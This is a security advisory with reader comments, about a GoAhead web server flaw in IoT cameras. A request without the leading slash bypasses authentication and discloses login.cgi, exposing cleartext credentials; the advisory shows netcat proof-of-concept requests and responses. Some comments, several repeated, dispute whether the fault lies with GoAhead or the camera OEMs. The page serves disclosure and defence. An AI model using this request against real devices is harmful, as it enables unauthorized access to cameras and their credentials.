SSD Advisory – Over 100K IoT Cameras Vulnerable to Source Disclosure
Vulnerability Summary
The following advisory describes an arbitrary file content disclosure vulnerability found in GoAhead web server.
The GoAhead web server is present on multiple embedded devices, from IP Cameras to Printers and other embedded devices.
The vulnerability allows a remote unauthenticated attacker to disclose the content of the file being accessed. As most embedded devices do not run a SQL (or SQL-like) daemon, the credentials for authentication are stored inside the file being accessed. Through this disclosure attack, an attacker can view the credentials required to access the device.
Credit
An independent security researcher Istvan Toth has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
Update #2: The vulnerability of the “/” less access causing file disclosure dates back to 2004, http://aluigi.altervista.org/adv/goahead-adv2.txt, I cannot find any indication when GoAhead fixed it – in any case it is still present in 2017 in devices that use the GoAhead server.
Update: The vendor (GoAhead) claims the vulnerability is not in his product, but rather in the camera vendor’s code.
We at Beyond Security, are unsure about this, but as none of the camera vendors responded, we are left in the dark at the root cause for the vulnerability.
Since this vulnerability affects practically multiple devices that have the GoAhead web server (these devices appear to implement old versions of GoAhead), there is no one company you can report these vulnerabilities to or get them addressed – further the majority of the products that are vulnerable are OEM products with no real “vendor” behind them.
We urge users who have an embedded device and have GoAhead running on them, you can know this by seeing the following banner returned when you connect to the device:
Server: GoAhead-Webs
To remove the device from the network, or at the very least not allow access to the web interface to anyone beside a very strict IP address range.
Vulnerabilities Details
The vulnerability is triggered sending a malformed request to the web server, you can see the difference between the regular request and the vulnerability triggering request here:
Normal request-response
$ echo -e "GET /login.cgi\n" | nc 192.168.88.131 81 nc: using stream socket HTTP/1.1 401 Unauthorized Server: GoAhead-Webs Date: Sun Feb 19 12:59:31 2017 WWW-Authenticate: Digest realm="GoAhead", domain=":81",qop="auth", nonce="ecfe10f4065c572c386bf68494d0c15a", opaque="5ccc069c403ebaf9f0171e9517f40e41",algorithm="MD5", stale="FALSE" Pragma: no-cache Cache-Control: no-cache Content-Type: text/html <html><head><title>Document Error: Unauthorized</title></head> <body><h2>Access Error: Unauthorized</h2> <p>Access to this document requires a User ID</p></body></html>
Vulnerability triggering request-response
Request without leading ‘/’ bypasses HTTP basic auth. Moreover, requesting login.cgi responds the cleartext credentials
$ echo -e "GET login.cgi\n" | nc 192.168.88.131 81 nc: using stream socket HTTP/1.1 200 OK Date: Sun Feb 19 12:59:36 2017 Server: GoAhead-Webs Last-modified: Thu Jan 1 00:00:00 1970 Content-type: text/html Cache-Control:no-cache Content-length: 77 Connection: close var loginuser="admin"; var loginpass="xxxx"; var pri=255;
The file (login.cgi) is not part of the GoAhead source distribution — it is a device OEM supplied file. So flagging all “GoAhead” http header devices is incorrect. There are many, many devices using GoAhead without such vulnerabilities.
Also, you should contact the GoAhead vendor (https://www.embedthis.com) first prior to disclosure as part of responsible disclosure practice.
We never said that the vulnerability is in the login.cgi, the vulnerability is in the web server that discloses the information (source code) rather than executes the file – which is the expected behavior.
The vulnerability dates back to 2004 – as can be seen here: http://aluigi.altervista.org/adv/goahead-adv2.txt
Please correct this disclosure. It is incorrect. Those files are not part of the GoAhead distribution, they are device OEM specific from a common white-label camera OEM.
Please practice responsible disclosure and inform the GoAhead vendor in future before release.
We never said that the vulnerability is in the login.cgi, the vulnerability is in the web server that discloses the information (source code) rather than executes the file – which is the expected behavior.
The vulnerability dates back to 2004 – as can be seen here: http://aluigi.altervista.org/adv/goahead-adv2.txt
Comments are closed.